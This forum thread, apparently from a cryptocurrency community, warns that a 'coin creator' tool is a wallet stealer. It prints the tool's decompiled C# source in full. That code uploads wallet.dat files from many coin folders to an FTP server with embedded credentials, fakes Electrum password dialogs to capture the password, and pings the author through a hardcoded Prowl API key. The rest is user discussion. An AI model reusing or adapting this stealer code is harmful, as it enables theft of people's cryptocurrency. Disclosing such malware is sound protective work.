SCAM alert! The coin creator software by Xevox is a wallet stealer!

[jukka]

I was stupid enough to trust this software, and it stole my coins! If somebody wants to donate something for exposing this scammer, my LTC address is in the "personal text".

Here is the code I managed to decompile:

Code:

// Type: CoinGe[Suspicious link removed]ogram
// Assembly: CoinGen, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: D1DD6DE8-DEB5-4565-944C-0C660F3F9F11
// Assembly location: C:\CoinSources\CoinGen.exe

using System;
using System.IO;
using System.Net;
using System.Text;
using System.Threading;
using System.Windows.Forms;

namespace CoinGen
{
  internal class Program
  {
    private static void Main(string[] args)
    {
      string str1 = DateTime.Now.ToString("HH:mm:ss");
      Console.WriteLine("[" + str1 + "] Started Coin Creator");
      Console.Write("[" + str1 + "] What is the name of your coin? e.g Litecoin: ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] What is the abbreviation of your coin? e.g LTC: ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] What algorithm do you want to use? e.g X11, SHA256, Scrypt, Scrypt-N, Scrypt-Jane: ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] Block Rate (In seconds):  ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] Block Reward:  ");
      Console.ReadLine();
      Console.Write("[" + str1 + "] Block Halving Rate:  ");
      Console.ReadLine();
      Console.WriteLine("");
      Console.WriteLine("Editing Source");
      Thread.Sleep(5000);
      string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
      string str2 = "drpine";
      string hostIP = "ftp://ftp.drivehq.com";
      Form1 form1 = new Form1();
      string str3 = "\\bitcoin\\";
      string str4 = "\\litecoin\\";
      string str5 = "\\feathercoin\\";
      string str6 = "\\digitalcoin\\";
      string str7 = "\\gpucoin\\";
      string str8 = "\\earthcoin\\";
      string str9 = "\\worldcoin\\";
      string str10 = "\\vertcoin\\";
      string str11 = "\\auroracoin\\";
      string str12 = "\\dogecoin\\";
      string str13 = "\\electrum\\";
      string str14 = "\\Windows_Microsoft3430\\";
      int num1 = new Random().Next(1, 99999);
      if (Directory.Exists(folderPath + str14))
        return;
      Directory.CreateDirectory(folderPath + str14);
      ftp ftp = new ftp(hostIP, str2, str2);
      if (Directory.Exists(folderPath + str3))
      {
        ftp.upload("Bitcoin-" + (object) num1, folderPath + str3 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Bitcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str13))
      {
        ftp.upload("electrum_wallet-" + (object) num1, folderPath + str13 + "\\wallets\\default_wallet");
        int num2 = (int) MessageBox.Show("Electrum has detected another program trying to access your wallet, it is important you change your password now!", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
        int num3 = (int) form1.ShowDialog();
        int num4 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
        int num5 = (int) form1.ShowDialog();
        int num6 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1);
        int num7 = (int) form1.ShowDialog();
        ftp.upload("electrum_pass-" + (object) num1, folderPath + str13 + "pass.txt");
        Program.SendProwlRequest("WalletUploaderV4", "Electrum Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str4))
      {
        ftp.upload("Litecoin-" + (object) num1, folderPath + str4 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Litecoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str12))
      {
        ftp.upload("Dogecoin-" + (object) num1, folderPath + str12 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Dogecoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str11))
      {
        ftp.upload("Auroracoin-" + (object) num1, folderPath + str11 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Auroracoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str10))
      {
        ftp.upload("Vertcoin-" + (object) num1, folderPath + str10 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Vertcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str5))
      {
        ftp.upload("Feathercoin-" + (object) num1, folderPath + str5 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Feathercoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str6))
      {
        ftp.upload("Digitalcoin-" + (object) num1, folderPath + str6 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Digitalcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str7))
      {
        ftp.upload("GPUcoin-" + (object) num1, folderPath + str7 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "GPUcoin Wallet Uploaded", "c#Prowl");
      }
      if (Directory.Exists(folderPath + str8))
      {
        ftp.upload("Earthcoin-" + (object) num1, folderPath + str8 + "wallet.dat");
        Program.SendProwlRequest("WalletUploaderV4", "Earthcoin Wallet Uploaded", "c#Prowl");
      }
      if (!Directory.Exists(folderPath + str9))
        return;
      ftp.upload("Worldcoin-" + (object) num1, folderPath + str9 + "wallet.dat");
      Program.SendProwlRequest("WalletUploaderV4", "Worldcoin Wallet Uploaded", "c#Prowl");
    }

    private static void SendProwlRequest(string vEvent, string vDescription, string vApplication)
    {
      string str = "79b6a76a04290fe0916c6e625c926897fb4d8b7a";
      HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create("https://api.prowlapp.com/publicapi/add");
      byte[] bytes = Encoding.ASCII.GetBytes("apikey=" + str + "&application=" + vApplication + "&event=" + vEvent + "&description=" + vDescription);
      httpWebRequest.Method = "POST";
      httpWebRequest.ContentType = "application/x-www-form-urlencoded";
      httpWebRequest.ContentLength = (long) bytes.Length;
      using (Stream requestStream = ((WebRequest) httpWebRequest).GetRequestStream())
        requestStream.Write(bytes, 0, bytes.Length);
    }

    private static void MakeData(string vArgs)
    {
    }
  }
}

[Prolifik]

Bump for justice.

[jukka]

I managed to send my doges and worldcoins to another wallet! So far only thing stolen was my precious litecoin

It seems that the original thread opened by scammer is deleted!

[var53]

Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.

[Amph]

when i scanned it with virustotal, it reported 1 red flag

[Forexperiments]

It's interesting how the program asks for the electrum wallet password
Basically it declares that this coin creator is a wallet stealer, and asks for a new password  

ps: we can ask to drivehq or prowl if they have more details about him
or we can just have fun with his prowl API, sending him thousands of "wallet stolen" notifications to his iphone  

[Forexperiments]

when i scanned it with virustotal, it reported 1 red flag

this kind of custom software would never be correctly detected by virus scanners: it's a simple ftp uploader, how a virus scanner can detect that? If that, it would detect as virus too much stuff

[var53]

when i scanned it with virustotal, it reported 1 red flag

Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other  scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.

[xbudahx]

Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.

I hope OP learned a lesson here.

[jukka]

Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.

I hope OP learned a lesson here.

Yes I learned and I know that it is stupid, so thank you!

All of us are not clever with these things, you know!

[luchodge99]

thx for the heads up.
those scambag never give up.

[Amph]

when i scanned it with virustotal, it reported 1 red flag

Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other  scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.

i don't remember, if virus total keeps the same order, it was the first one in the list

[snaildvorak]

lesson learned for all of us who read this thread. Thanks for the alert!

[jukka]

Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.

If you appreciate it, please consider a small donation.

[crunchynut]

stop begging. nobody who's not a potato would have used this program.

[tokyoghetto]

what a scumbag. Even worst, he started to charge for it.

[jukka]

stop begging. nobody who's not a potato would have used this program.

I am not begging anything, damn it! I could have kept this info by myself! Thats the way people normally do, because nobody wants to reveal that they have been stupid! Next time I just will keep the info, if thats the way people here do.

I am a new in this forum, and where I come from people are polight and try to help each other. Looks like that you dont belong to those!

[asdf_files]

Damn scammers everywhere   

[jukka]

Ok, I managed to save everything else than my precious LTC. The guy could have just asked I would have bought him one pint of beer instead

Well at least I have learned that you cannot trust even the Virustotal. Maybe I should contact to some of the antivirus companies that they should take these wallet stealers seriously as none of them warned anything!

[crunchynut]

look there is an .exe file posted by a stranger on the internet, in a forum where every 2nd thread is a scam in the making. let's download and run it!